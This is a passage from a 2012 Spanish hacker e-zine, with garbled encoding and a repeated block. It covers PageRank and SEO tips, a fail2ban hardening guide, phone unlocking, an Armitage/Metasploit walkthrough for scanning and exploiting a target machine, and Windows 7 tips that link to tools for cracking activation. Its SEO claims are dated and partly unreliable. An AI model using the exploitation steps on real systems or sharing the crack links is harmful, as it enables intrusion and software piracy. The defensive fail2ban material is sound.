Ahora ya no existen. Parece ser que Google utiliza ya un rango debots con IP 64.68.82.* que sirven para indexar p?ginas nuevas ytambi?n para meterlas de forma fija en el indice. Una vez que

google que localiza una pagina, se guarda la informaci?n sobre lamisma, la analiza, la pasa a un editor, y a esa pagina se le da una nota.

Una nota entre el 1 y el 10. A esa nota se le conoce como PageRank.de2/10

?Como puedes saber el PageRank de las p?ginas que visitas?

F?cil, con una herramienta, la Googlebar. Descargal? e instalal?:

Aqui teneis el enlace ara los que usan Explorer y para los que usan unnavegador de verdad, Modzilla. Con la googlebar, podremos no solosaber cual es el page rank de una p?gina, si no que incluso podremos"VOTAR" a esa p?gina para que google tenga una referencia denuestros gustos. Adem?s incluye otras interesantes opciones que yair?is descubriendo.

?Me hablas un poco m?s del Page Rank?

Pues para que os hag?is una idea:Una pagina Web que tiene un page rank 5/10 o 6/10 es una p?ginaimportante, ?sea, que cualquier palabra que se escriba en esa Web, esuna palabra que aparecer? casi siempre, en los primeros resultados degoogle: Consecuencia­> mogoll?n de visitas.

?Por qu? es interesante recibir visitas a tu p?gina desde google?

­ En primer lugar por que mola :) . Y en segundo, por que eso quieredecir que llegara gente que se interesa por lo que escribes.

Pues a ver. Si tienes un page rank 2/10 o 3/10... La verdad, es que degoogle te van a venir pocas cosas. Lo suyo es tener como m?nimo4/10 o 5/10. Para lograr aumentar el page rank de tu p?gina, aqu? vanalgunos consejos imprescindibles:

1­ Tener el c?digo de tu pagina, limpio y ordenado,( A Google lemolan las cosas bien hechas y valorar? la calidad del c?digo). Pod?isvalidar vuestras paginas aqu?. De hecho el codigo limpio y ordenadono ayuda directamente a subir el Page Rank, pero si que mejoramucho el posicionamiento de las paginas, osea que es una una manerade aprovechar al maximo nuestro page rank.

2­ Que te "Linken" desde p?ginas que tengan un Page Rank alto. Tal ycomo los enlaces de p?ginas con Page Rank inferior o igual a 3/10

20 21SeNeGe

Page 21: Dhackers revista 01

apenas cuentan para aumentar el Page Rank (aunque si cuentan).Cualquiera con un Page Rank superior o igual a 4/10 har? que sumesmuchos puntos en google. (?l es as? de chulo).

3­ Indexar tu pagina en DMOZ!!!! important?simo, Dmoz es eldirectorio en el que google basa sus b?squedas, una vez a?adido tuBlog all?, pasara a ser un Blog "Oficial". ?No esperes m?s aa?adirlo!

Estos son los 3 puntos mas importantes para mejorar el Page Ranken Google,tambi?n son importantes las metas que le pongas a tupagina y las palabras clave que uses.

"Entre p?ginas que se enlazan hay mucho trapicheo con esto delpage rank, por que claro las p?ginas con el Page Rank mas altopueden ayudar mucho a una p?gina nueva por ejemplo. Por eso esimportante lograr tener un enlace en esas p?ginas, o en losdirectorios donde se adecue la tuya, ya que tambi?n suelen tener unPage Rank importante"

Cuando alguien ponga en Google la palabra "Coche" por ejemplo,Google lo que hace es buscar:

­ Primero las webs que tengan la palabra en el dominio mismo, oseaen la url www.coche.com por ejemplo, ohttp://www.paginaweb/coche.

­ Luego las que tengan la palabra coche en su tituloCódigo:<Title>Coche</Title>­ Y por ultimo aquellas que en el cuerpo de la pagina este escrita lapalabra coche. Y es aqui donde influye el page rank, si es un tio conun page rank 8/10 el que ha escrito por ejemplo "ayer me compre uncoche" con ese pedazo page rank va a salir en las primerasbusquedas, aunque la palabra coche sea tan comun.

Si es un tio con page rank 3/10, pues en una palabra tan comuncomo coche, seguramente aparecer? en las ultimas paginas. Ahi estael detalle del Page Rank

Una p?gina con un Page Rank bajo, puede aparecer en las primerasposiciones de Google por tener una palabra clave en su url o en sutitulo. Pero claro las palabras que podemos meter en un title sonlimitadas, lo suyo es que sean las palabras del cuerpo de la paginalas que aparezcan en buenas posiciones, por que esas son las quecuentan, las que se actualizan, y las que son un monton.

De todas las paginas que puedan tener en unenlace a la tuya, paragoogle cuentan las que tienen Page Rank 4/10 o superior. Las demastambien cuentan pero su valor es menor, ademas aunque las ve noson tan importantes.

Desde aqu? podeis descargar un pdf en ingles que trata el tema delPag Rank profundamente. Algunos consejos a recordar paramejorar el Page Rank y el posicionamiento de busqueda.

­ Tener el codigo de la p?gina y las hojas de estilo validadas esmuy util. En primer lugar por que tener el codigo ordenado, nospermite trabajar la p?gina y efectuar los cambios de una maneramuch mas comoda. Adem?s siempre es un orgullo tener un codigolimpio, como recompensa a un trabajo bien hecho, es como si tepusiesen un 10 haciendo los deberes.Pero sobre todo tener un codigo validado es importante por queGoogle lo bonifica con el posicionamiento de busqueda

­ El que esteis a?adidos en DMOZ. En serio que es superimportante, por que adem?s de mejorar los resultados de vuestrabusqueda, permitira que google os de sirmpre preferencia es comosi estuvieseis "registrados" y fueseis sus ni?os bonitos.

­ A?adir vuestras a directorios y buscadores donde tengan cabida,pues normalmente esos links llegan con un Page Rank alto.

­Jugar con las metas en vuestras paginas, a Google le gusta untrabajo bien hecho y explicito, por ejemplo esto seria un buenencabezado, que no el mejor. (Mi p?gina) , aunque googleacostumbra a pasar de todo, son datos que os ayudaran a mejorar elposicionamiento, y ademas sera util para otros buscadores quelleguen a vuestras p?ginas

Código:.<!DOCTYPE html PUBLIC "­//W3C//DTD XHTML 1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1­transitional.dtd">

Código:<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es­ES"lang="es­ES"><head><title>xxxxx Blog ­ Web personal de xxxxx</title><meta name="description" content="xxxx" /><meta name="keywords" content="Bitacora, Blog, Blogs, Weblog,Weblogs, Web Personal" /><meta name="author" content="xxx xxx xxx" /><meta name="robots" content="all" /><meta http­equiv="Content­Type" content="text/html; charset=iso­8859­1" /><meta http­equiv="Content­Language" content="es" /><meta name="copyright" content="tu nick" /><meta name="Reply­to" content="tu mail" /><meta name="generator" content="tus herramientas" />

21

Page 22: Dhackers revista 01

<base href="http://(vuestra url)/" />

Todo esto es un poco pijerio ya lo se, pero es util para google, siestais interesados en que os trate bien y en aumentar las visitas avuestras p?ginas, lo tendreis que tener en cuenta.

Calculando el Page Rank

Dado que el PageRank se traspasa entre p?ginas, mediante enlaces,para calcular (siempre de forma aproximada) el PageRank total deuna p?gina web habr? que saber el PR que recibe de cada uno de losenlaces que apuntan a ella.Cada documento web tiene la capacidad de repartir el 85% de suspuntos de PR entre todos los enlaces que contenga. Esto quiere decirque el PR que otorga un enlace se calcula como el PR de la p?ginaen cuesti?n, multiplicado por 0.85 y dividido entre el n?mero deenlaces total que contenga. De forma orientativa, dado que es muyprobable que las puntuaciones hayan variado a lo largo del tiempo, latabla de correspondencia entre puntos de PR y rangos de PR (de 0 a10) era la siguiente:

Código:PR1 = 0.00000001 hasta 5PR2 = 6 hasta 25PR3 = 25 hasta 125PR4 = 126 hasta 625.....PR10 = 1953126 hasta infinito

Por ejemplo una p?gina de PR6 (supongamos 3200 puntos) con 20enlaces traspasa 136 puntos de PR a cada una de las p?ginas a lasque apunta: 3200 x 0.85 / 20 = 136

Muchas veces es m?s beneficioso recibir PR de p?ginas con pocapuntuaci?n pero tambi?n pocos enlaces totales, que de una p?gina dePR alto y muchos enlaces. Estos datos son utiles, pero son antiguos yno todos los expertos los comparten, aun asi os pueden ayudar ahaceros una idea orientativa bastante importante. Fuente: Javi ­forobuscadores.com

?Como reconocer a los bots de Google?

Si tienes acceso a los "logs" de tu servidor, puedes saber si elGooglebot ha pasado por tu sitio y lo ha indexado. S?lo tienes quebuscar las ips de los bots. Los bots de google tienen un rango de ipsdesde 64.68.82.*

Es importante tener en cuenta para que los buscadores trabajen bien,y para que si lo deseais no indexen algunas p?ginas o carpetas"secretas" que querais tener en vuestro servidor. Debeis crear un

archivo llamado robots.txt en cuyo contenido aparezca lo siguiente:# robots.txt for el que lo quiera

Código:User­agent: *Disallow: /admin/ # aqui las carpetas que querais que nadie veaRecomendado: http://www.robotstxt.org/

?Habeis visto el robots.txt de google alguna vez?http://www.google.com/robots.txt

22

Page 23: Dhackers revista 01
Page 24: Dhackers revista 01

los dos ultimos fines de semana tuve qsacar intrusos de servidores qadministro, nada peligroso ya q losequipos estan actualizados y bastanteprotegidos dentro de lo posible, perosiempre esta el problema de losusuarios y el cuidado q le dan a suscontraseñas... enambos casos sevieron comprometidascuentas de losmismos. en la 1eralograron entrar x sshy correr un script qenviaba spam, en la2da simplemente un login de correocon el mismo proposito pero enviandouna scam tipica, este era el texto:

Please be informed that you have£100,000 British Pounds Lodged in ourWestern Union to transfer to you aswinner of ECOWAS Lottery Jackpot.

Please Contact:[email protected]

al entrar hizo un par de pruebasenviandose a direcciones propias q sonlas siguientes:

[email protected]@[email protected]

no fue lo suficientemente inteligentepara borrar ni siquiera los correos qenviaba, simplemente consiguio lapass del usuario y me puso en cola 10millones de correos q se estuvieronenviando durante unas horas hasta qme di cuenta. creo q penso q siendodomingo no lo veria hasta el lunes perox suerte suelo checkear logs bastanteseguido.

los spammers/scammers estan en laescala mas baja de la porqueria existenteen internet, tanto desde el punto de vistadel usuario q recibe montones de correosq no le importan como del administrador qtrata de hacer todo lo posible paraminimizar el impacto en el buzon del

usuario final.

pero el peligro no estasolo en parar la basurasino tambien enproteger nuestrosservers ya q son unacodiciada presa para

ellos, la oportunidad de hacer unoscuantos billetes a costa de nuestro buennombre... je

asi tambien tenemos los miles de scriptkiddies q pasan el dia con sus programasde fuerza bruta y sus diccionariosprobando combinaciones de user/pass yalgun ocasional hacker o aprendiz q puedeocasionar algo mas de trabajo. mas deuno se sorprenderia al ver los logs de unserver publico, al final de la entrada voy apastear algunos para q vean el nivel de losataques...

para detener este tipo de ataquesautomatizados existe fail2ban, q es unsoftware q en base a los logs del sistemapuede bannear IPs en base a intentosfallidos de logueo. a pesar de tenerloinstalado en la mayoria de los servers tuveq ponerlo en TODOS y ajustar laconfiguracion para q sea todavia masagresiva. de paso aprovecho para haceresta entrada para q vean q no es nadadificil de instalar y configurar y ciertamentehace darse x vencido a la mayoria de losintrusos.instalacion

a pesar de q son muy parecidas voy aexplicar la instalacion tanto paracentos/redhat como para debian/ubuntu.para el 1ero tenemos q descargarlodesde:

http://sourceforge.net/projects/fail2ban/

lo extraemos con:tar xvf fail2ban­x.x.x.tar.bz2despues...cd fail2ban­x.x.xpython setup.py installa continuacion lo agregamos al arranquedel sistema copiando el siguientearchivo:

cp /files/redhat­initd /etc/init.d/fail2banchkconfig ­­add fail2banchkconfig fail2ban onservice fail2ban start

en debian/ubuntu lo podemos bajar delos repositorios con:

apt­get install fail2ban (sudo en ubuntu)

lo siguiente es configurar las "jails" paralos servicios q queremos proteger. paraeso vamos a /etc/fail2ban y editamos elarchivo jail.conf haciendo una copia deseguridad antes por las dudas...

la configuracion puede variar un poco deuna version a otra pero las opciones sonmas o menos las mismas siempre. endebian x ejemplo, las acciones, tiemposde banneo, etc vienen definidas alprincipio de manera gral o se puedenpersonalizar despues en cada jail.

lo primero es setear las redes e IPsseguras, o sea las q queremos q elsistema no blockee nunca, como elrango de nuestra propia lan o

FAIL2BANComo proteger servicios de ataques de fuerza bruta

24 25|_ocutus

Page 25: Dhackers revista 01

direcciones de usuarios del sistema. esto sehace modificando el campo "ignoreip", porejemplo:

ignoreip = 127.0.0.1 192.168.0.0/24200.53.23.1 10.0.0.0/25

mas abajo tenemos los tiempos y situacionesdel blockeo, q podemos dejar como estan oeditarlas como queramos. son las siguientes:

bantime: es la cantidad de segundos q una IPes banneada (default 600).findtime: un host es banneado si se logueaerroneamente tantas veces como la cantidaden "maxretry" dentro del "findtime" (default600seg).maxretry: es el numero de intentos fallidosantes de ser blockeado.

pasamos ahora a configurar las jails(carceles). una de las mas usadas es la dessh asi q empecemos x esa, vamos hasta"[ssh]" y x default (en debian x lo menos) yala tenemos activada. sale mas o menos asi:

[ssh]enabled = trueport = sshfilter = sshdlogpath = /var/log/auth.logmaxretry = 6

y asi para centos:

[ssh­iptables]enabled = truefilter = sshdaction = iptables[name=SSH, port=ssh,protocol=tcp]

sendmail­whois[name=SSH,dest=root, sender=fail2ban@fail2ban]logpath = /var/log/securemaxretry = 6

lo q mas nos interesa es q el enabled este en"true" (activada) y el logpath q es la ruta dellog de seguridad del sistema, esta cambia deun sistema a otro como se puede ver. endebian vemos q falta el campo "action", esoes xq viene definido antes en la seccion

"actions" con el campo "banaction".

en el action de centos vemos dosacciones, iptables y sendmail whois. la1era crea una regla de iptablesblockeando la IP y la 2da envia uncorreo con un whois de la misma aldestinatario configurado (root en estecaso).

vamos a crear alguna jail mas x si noquedo muy claro, postfix en centos:

[postfix­tcpwrapper]enabled = truefilter = postfixaction=hostsdeny[file=/etc/hosts.deny](ruta al archivo hosts.deny)

sendmail[name=Postfix,dest=root]logpath = /var/log/maillogbantime = 6000

en debian:[postfix]enabled = trueport = smtp,ssmtpfilter = postfixlogpath = /var/log/mail.log

y asi tenemos todo tipo de jails para ftp,http y todos los servicios y la mayoriade los ataques posibles. seriainterminable y no tendria mucho sentidoexplicarlas una a una, simplementeexperimentando un poco se puedenactivar bastante facil.roundcuberoundcube es un cliente de webmailrelativamente nuevo (todavia esta enbeta) con muchisimas opciones y unainterfaz q no tiene nada q envidiarle aninguna otra. en mi humilde opinion esmuy superior al eterno squirrelmail qparece casi prehistorico al darle unamirada a uno y el otro.

los logueos de correo pueden serblockeados con la jail "postfix" o el MTAq usemos como vimos antes, perotambien se puede dar el caso (como me

paso a mi) de que el webmail corra enun server mientras q el MTA esta enotro. en este caso nos vemos obligadosa agregar la IP del 1ero en la lista deignoradas del fail2ban del 2do para nobannear a todos los usuarios ya q ladireccion de origen del logueo essiempre la misma para todos.

para solucionar esto podemos usar unplugin escrito x matt rude, q se puededescargar desde aca:http://mattrude.com/projects/roundcube­fail2ban­plugin/

hay q copiar el contenido dentro deldirectorio de plugins de roundcube(roundcube/plugins) y despues editar elcontenido del archivo main.inc.php qesta dentro del directorio "config",agregando en la seccion de plugins lasiguiente linea:

$rcmail_config['plugins'] =array('fail2ban');

con esto se crea un nuevo archivollamado userlogins en la carpeta logsconteniendo solo los intentos fallidos qusamos para el fail2ban creando unanueva jail:

[roundcube]enabled = trueport = http,httpsfilter = roundcubelogpath =/pathderouncube/logs/userloginsel eterno punto debil

obviamente esto no nos deja 100% asalvo pero ayuda bastante, de todasformas nunca es bueno confiarnosdemasiado y mantener siempre lossistemas actualizados, los permisosbien configurados y los usuarios con laspasswords mas complejas posibles...aunque siempre seran usuarios ysiempre cabe la posibilidad de q haganclick donde no deben entregando susdatos ante cualquier loteria de turquia o

25

Page 26: Dhackers revista 01

una herencia del principe de liechtenstein...

... ese es el verdadero punto debil.apendix

como habia prometido copio unas horas del log de fail2ban en un servidor de correo publico(no muy grande) para q vean la cantidad de conexiones blockeadas. la mayoria son depostfix pero hay alguna de ssh.

2012­05­24 04:02:41,098 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.49.25.2052012­05­24 04:14:01,114 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.224.163.1832012­05­24 04:52:59,128 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban186.105.151.682012­05­24 05:01:16,142 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban90.170.212.1172012­05­24 05:01:32,156 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.172.162.352012­05­24 05:31:24,170 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban188.138.115.2372012­05­24 05:54:26,188 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.1.142.882012­05­24 05:56:43,202 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.139.154.1172012­05­24 06:04:14,217 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban181.14.149.1572012­05­24 06:42:19,230 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.16.233.2532012­05­24 06:47:21,242 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban189.45.204.1382012­05­24 06:54:42,259 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 41.79.176.102012­05­24 07:13:24,273 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.14.133.182012­05­24 07:14:32,287 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban168.226.249.182012­05­24 07:18:01,301 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban168.226.165.1932012­05­24 07:19:59,315 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban181.14.130.1742012­05­24 07:28:02,330 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.31.98.412012­05­24 08:02:34,618 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban181.14.150.1012012­05­24 08:03:04,633 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.139.223.412012­05­24 08:16:23,647 fail2ban.actions: WARNING

26

Page 27: Dhackers revista 01
Page 28: Dhackers revista 01

una herencia del principe de liechtenstein...

... ese es el verdadero punto debil.apendix

como habia prometido copio unas horas del log de fail2ban en un servidor de correo publico(no muy grande) para q vean la cantidad de conexiones blockeadas. la mayoria son depostfix pero hay alguna de ssh.

2012­05­24 04:02:41,098 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.49.25.2052012­05­24 04:14:01,114 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.224.163.1832012­05­24 04:52:59,128 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban186.105.151.682012­05­24 05:01:16,142 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban90.170.212.1172012­05­24 05:01:32,156 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.172.162.352012­05­24 05:31:24,170 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban188.138.115.2372012­05­24 05:54:26,188 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.1.142.882012­05­24 05:56:43,202 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.139.154.1172012­05­24 06:04:14,217 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban181.14.149.1572012­05­24 06:42:19,230 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.16.233.2532012­05­24 06:47:21,242 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban189.45.204.1382012­05­24 06:54:42,259 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 41.79.176.102012­05­24 07:13:24,273 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.14.133.182012­05­24 07:14:32,287 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban168.226.249.182012­05­24 07:18:01,301 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban168.226.165.1932012­05­24 07:19:59,315 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban181.14.130.1742012­05­24 07:28:02,330 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.31.98.412012­05­24 08:02:34,618 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban181.14.150.1012012­05­24 08:03:04,633 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban190.139.223.412012­05­24 08:16:23,647 fail2ban.actions: WARNING

Hola amigos en esta ocasión les traigo unapequeña investigación de las personas quereparan nuestros teléfonos celulares.¿Porque sobre ellos?Por que como hoy en día la mayoría denosotros andamos un teléfono celular y auno que otro de nosotros se nos haestropeado, queremos liberarlo,desbloquearlo, o simplemente queremosactualizarlo.Ahora veremos un proceso de cómo es quese libera un teléfono Sony Ericsson E15(Xperia X8).Con herramientas profesionales y usadaspor un profesional.En este caso usaremos una herramienta quese llama Medusa Box, cable de serviciopara el modelo antes mencionado y surespectivo software.

Después de tener las herramientasnecesarias, comenzamos con el proceso

Después de tener las herramientasnecesarias, comenzamos con el proceso deliberación para nuestro teléfono.Conectamos nuestro teléfono a la Box con

nuestro cable de servicio.Lo conectamos con el software y ledamos clic en la opción que nos dice“Unlock” esperamos que termine elproceso y listo teléfono liberado.

Desconectamos y a disfrutarnuestro teléfono con cualquier

compañía.

SERVICIO E-ZINE

28 29nomo11

Page 29: Dhackers revista 01

¿Muy sencillo no? ¿Creesque tú lo puedes hacersolo adquiriendo lasherramientas? ¿Creesque no hay más detrás delproceso?Bueno amigos perdón porexpresarme así pero laverdad hay muchaspersonas que no lesparece el precio por elservicio que se les da ypiensan que aunque sevea fácil y sencillo dehacer, es muycomplicado, porquepodemos adquirircualquier herramientapara poder hacerlonosotros mismos, pero sino sabemos cómo usar elsoftware, cómo usar elcable, qué hacer cuandoestemos haciendo todoslos pasos bien y elsoftware nos marquealgún error desconocido,eso es por eso que secobra el servicio yaunque hay veces no nosparezca el precio, laspersonas que lo hacenson profesionales einvierten en suconocimiento y

herramientas.Ya ahí viene el dicho:“Se cobra por lo que sesabe, no por lo que se hace”“Precio de tornillo acambiar $ 10 pesos, saberque tornillo cambiar $ 100pesos”¿Quieres un servicioexprés?Hay muchas personas quequieren un servicio súperexprés, o por lo menos loquieren en menos de 30 sino su servicio lo quierengratis.En algunas ocasiones, se lesotorga un servicio exprés,pero también depende elmodelo de teléfono, aunquehay veces nos parezcaincreíble, un teléfonosencillo o muy básico nospuede llegar a costar máscaro liberarlo que lo que noscosto y puede tardar hasta 2o 3 días en liberarlo.¿Por qué?Por que el nivel deseguridad es muy alto onuevo que todavía no haydicha herramienta y salemuy caro el código deliberación.También, es el mismo casocon las reparaciones físicas,ya que puede ser que elfabricante sea muy elevadoel costo de fabricación delproducto y también es poreso que hay veces que larefacción nos sale tambiénmás caro que el teléfono.Bueno amigos ahora yatienen un idea de cuándollevemos nuestro teléfono aservicio técnico y noandemos con berrinches porqué no nos parece el trabajoque nos van a realizar.29

Page 30: Dhackers revista 01

Primero que nada bienvenidos a estaparte del articulo de la ezine en estaparte veremos armitage que es unaherramienta grafica para poder usarmetasploit.

Para utilizar armitage tenemos quetener por lo menos java, metasploitactualizado, y armitage…Puedes visitar su pagina oficial quecontiene mucha información necesaria:http://www.fastandeasyhacking.comBueno empecemos abriendo armitage ,ah! Por cierto, armitage lo puedes usarWindows,Linux y mac, en este casoutilizaremos backtrack que en estemismo articulo puedes ver como seinstala.

Abrimos el armitage….

Aquí puedes configurar el armitage para laconeccion, por ejemplo en host puedesponer tu ip publica o tu ip privada, en portel puerto que quieras y user y pass lo mismolo que tu quieras no es necesario tenerloconfigurado asi, pero en este ejemplo comoes un ejemplo practico lo veremos asi… ledamos en connect…

Aca si te sale esa ventana le

das en YESLuego empezara a realizar su coneccion….Ya luego estará listo armitage…Ahora lo primero que hacemos siempre parapoder identificar una maquina vulnerableses hacerle footprinting o recolección dedatos sobre la maquina o victima, en estecaso analizaremos sus puertos aver cual esvulnerable e intentaremos acceder, aaah!Otra cosa es que no solo acepta escaneos denmap son también de:Acunetix, nessus,openvas,retina y otros maspero puse los que conozco por que son

famosos en internet xD!Host>Nmap Scan>Intense ScanComo ves allí tenemos para escanear connmap en este caso los puertos un escaneo

intenso:PLuego te pide la ip a escanear puedes hacerun simple ping para conseguir la ip de un

host, en mi caso como la maquina es localpondré la ip local, ahora si tu maquina eslocal pero son muchas maquinas y nosabes ¿Cuál esta encendida? ¿Cuál tieneuna vulnerabilidad? Puedes hacer otro tipode escaneo 192.168.x.x/24 le agregas el 24y escanea todas las maquinas en red eneste caso la ip seria desde el modem y laspcs…Le doy en OKPor ultimo termina el escaneo ahora medice que use buscar ataques… para poder

explotar…Una cosa importante es que tengohabilitado el firewall de mi pc, muchasveces se lo puede brincar el firewall haymuchos métodos para poder hacerlo, peroeste tema no lo tocaremos…Entonces tenemos un Windows :P que nosabemos todavía si es vulnerable, asi quebuscamos los ataques..

Nos tirara un mensaje como el siguiente:Dice que el análisis de ataque se completoLo siguiente solo seleccionamos el host enesta caso un windows clic derecho y en laparte de attack buscamos un posible

armitageEntrando a un equipo

30 31arthusu

Page 31: Dhackers revista 01

ataque que pueda funcionar :D

Asi que intentaremos ese ataque…

Aquí nos sale lo que podemosconfigurar…LHOST = local host nuestr ip localLPORT = local port al que estaremosescuchando o conectandoRHOST = ip publica o local de lavictima seria xDRPORT = el puerto a atacarTargets = es el tipo de sistemaoperativoTambien podemos habilitar la opciónuse a reverse conection que puede sermuy interesante.Por ultimo para lanzar el exploit ledaremos en LaunchAhora si el ataque no es exitoso comoesperabas puedes intentar mas exploitso puedes intentar usar la opción deautpwn de metasploit que va probandoexxploits y configurándolosautomáticamente hasta ver si lamaquina es vulnerable… para ello

haremos:Y saldrá:

Esto significa que estalanzando los exploits probandocual funciona.

Ahora si la maquina no es vulnerable te saldrá Noacitve sessions. En mi caso mi maquina no esvulnerable por que le meto a cada rato los parchesnuevos que van saliendo y tengo el sistemaactualizado aunque sea XP XD!, ahora si lointentamos con una maquina vulnerable que pasa…

Y listo una maquina en tuposición sistema operativoLinux :DSaludos a todos! Dhackerspor siempreArthusu 2012

31

Page 32: Dhackers revista 01

Trucos Windows 7Desde que hay windows siempre tenemosformas de hacer diferentes trucos, ahora letoca a Windows 7 el sistema operativo masusadoo y actual en este momento, vamos amostrar algunos truquitos para mejorar lafinalidad y saber mas a serca de este OS.

1 ­ Cual es el mejor antivirus paraWindows 7?Pues hay muchos pero personalmenterecomiendo, Avast Antivirus Home EditionY AVG antivirus Free.2 ­ Como Bloquear la sesión de Windows 7desde un icono partiendo del escritorio.Para esto lo que vamos a hacer es; crear unicono de acceso directo al bloqueo delordenador hacemos los siguiente:

Clic con el botón derecho del ratón en elescritorio y seleccionamos "nuevo".

Luego Seleccionamos "acceso directo".

proseguimos a que nos pedirá de introducirun campo de texto y escribimos esto :rundll32.exe user32.dll,LockWorkStation

entonces le damos a siguiente eintroducimos el nombre del acceso directo,por ejemplo : bloquear PC

Y listo solo finalizamos y ya tenemos elicono para bloquear el ordenador con unsimple doble clic encima.

Tambien podemos dejar el icono en elescritorio o anclarlo a la barra de tareas conlo que simplemente pincharemos una vezcon el ratón en el y la máquina bloquearála sesión.

3 ‐ Hacer copia de seguridad de nuestrosgadgets de Windows 7

Es importanter siempre que tenemosmuchos gadgets y no queremos perderlos

para volver adescargar de nuevo es muytedioso entonces hay forma de hacer unacopia de seguridd de una manera muyfacil:

Primero vamos a bontón de inicio deWindows y escribimos lo siguiente en elcuadro de búsqueda:C:\Users\Username\AppData\Local\MicrosoftCambia "C" por la unidad en la que tengasinstalado tu Windows 7 y "username" porel usuario que tengas para iniciar sesion.

4 ­ optimizar el rendimiento de Windows7con discos SSD

Hoy en dia Windows 7 tiene preparadopara detectar la instalación de discos SSD,tras lo cual, automáticamente deshabilita ladefragmentación, pero es bueno asegurarsede ello, por lo que vamos a panel decontrol, herramientas administrativas yluego a Servicios, ahí buscamos el servicioDefragmentador de Disco y lodeshabilitamos (sigue).

El uso de discos SSD acelera los tiemposde encendido y apagado del ordenador porlo que la opción de hibernación pierdesentido.Teniendo claro que no usaremos el modode hibernación, deshabilitándolo te librarásdel archivo hiberfil.sys, el cual ocupa, enmi caso 2,3 Gb y está en la raiz de launidad donde tenemos instalado Windows7. Para ver este archivo de sistema tendrásque ir a las opciones de carpeta y búsqueday elegir "ver archivos y carpetas ocultos".

Para deshabilitar la hibernación iremos aInicio, escribiremos CMD, pulsaremosEnter y en la ventana negra de DOSescribiremos powercfg –h off y con ello lahibernación quedará deshabilitada y telibrarás de ese pesado archivo.

5 ­ Instalar Windows 7 con todos los pasosexplicados

LA INSTALACION!

1. Introducir el DVD de Windows 72. Nos aparecerá un texto como elsiguiente “Presione cualquier tecla paraarrancar desde el CD o DVD”,presionamos cualquier tecla3. Finalmente veremos la pantalla depresentación de Windows 7, en donde nospreguntaran el idioma y demás opciones.Seleccionamos el español y luegoterminamos de configurar la hora y elteclado4. Hacemos clic en el botón “InstalarAhora”.5. A continuación deberás leer el contratode licencia de Microsoft para luego aceptarlos términos de licencia. Por ultimo debeshacer clic en Siguiente.6. En la siguiente pantalla tendrás dosopciones, la de actualizar el (Upgrade) y lade la instalación personalizada (custom).Hacemos clic en Personalizada.7. Seleccionaremos cualquier partición quetengamos disponible y haremos clic eninstalar. SI no tenemos formateado el discorígido, tendremos que hacer clic en“Formatear” para dejar sin archivos a esapartición.

8. Cuando hayas formateado la partición, teubicaras donde quieres instalar el Windows7 y le das clic en siguiente.

9­ Una vez terminado el copiado dearchivos, escribirás un nombre de usuario ynombre de equipo si tu quieres. Click ensiguiente

10.En la siguiente pantalla nos preguntaranuna contraseña, la cual obviamente seráopcional y personal. Puedes dejar enblanco estos campos si tu lo deseas. Clic en

32 33IPepe

Page 33: Dhackers revista 01

siguiente.11. En esta ventana ingresaras el numero deserie Windows 7, por ultimo le haces clicen siguiente12. En la siguiente pantalla seleccionamos“Usar la configuración recomendada”13. Configuras tu zona horaria dependiendodonde te encuentres.14. En este paso deberes elegir la ubicacióndel equipo; Casa (red domestica), Trabajo(red de trabajo), Cyber o demás (RedPublica).Finalmente has terminado con la instalaciónde Windows 7.6 ­ Herramientas seleccionadas para tuneartu Windows 7

Para ver el video:http://www.youtube.com/watch?feature=player_embedded&v=Xac8kl_RZJQ

7­ Como activar tu Windows 7

Con la heramienta Windows 7 OEM KeyAhora esta herramienta dispone deactualización de las Claves de producto yde los Certificados.

Descarga:

http://hotfile.com/dl/122904513/81751d8/Windows_7_OEM_Key_3.29.06.2011.exe.html

http://www.fileserve.com/file/cdsfaqM

https://rapidshare.com/files/891213057/Windows_7_OEM_Key_3.29.06.2011.exe

8 ­ Crackear Windows 7 para toda la vida:

Ahora podemos Crackear windows 7(32/64) para toda la vida, Solo abrir luegoejecutar la aplicación, darle a intalls,esperar, darle a ok y se reinicia el pc, unavez iniciado windows, ya tienes windows 7original de por vida.

Descarga de la herramienta:http://shareflare.net/download/87780.87e696f1b46e45f2c331cf72baadcb21e/Hack_7_sinpass.rar.html

9 ­ Instalar Windows 7 desde una llaveUSB

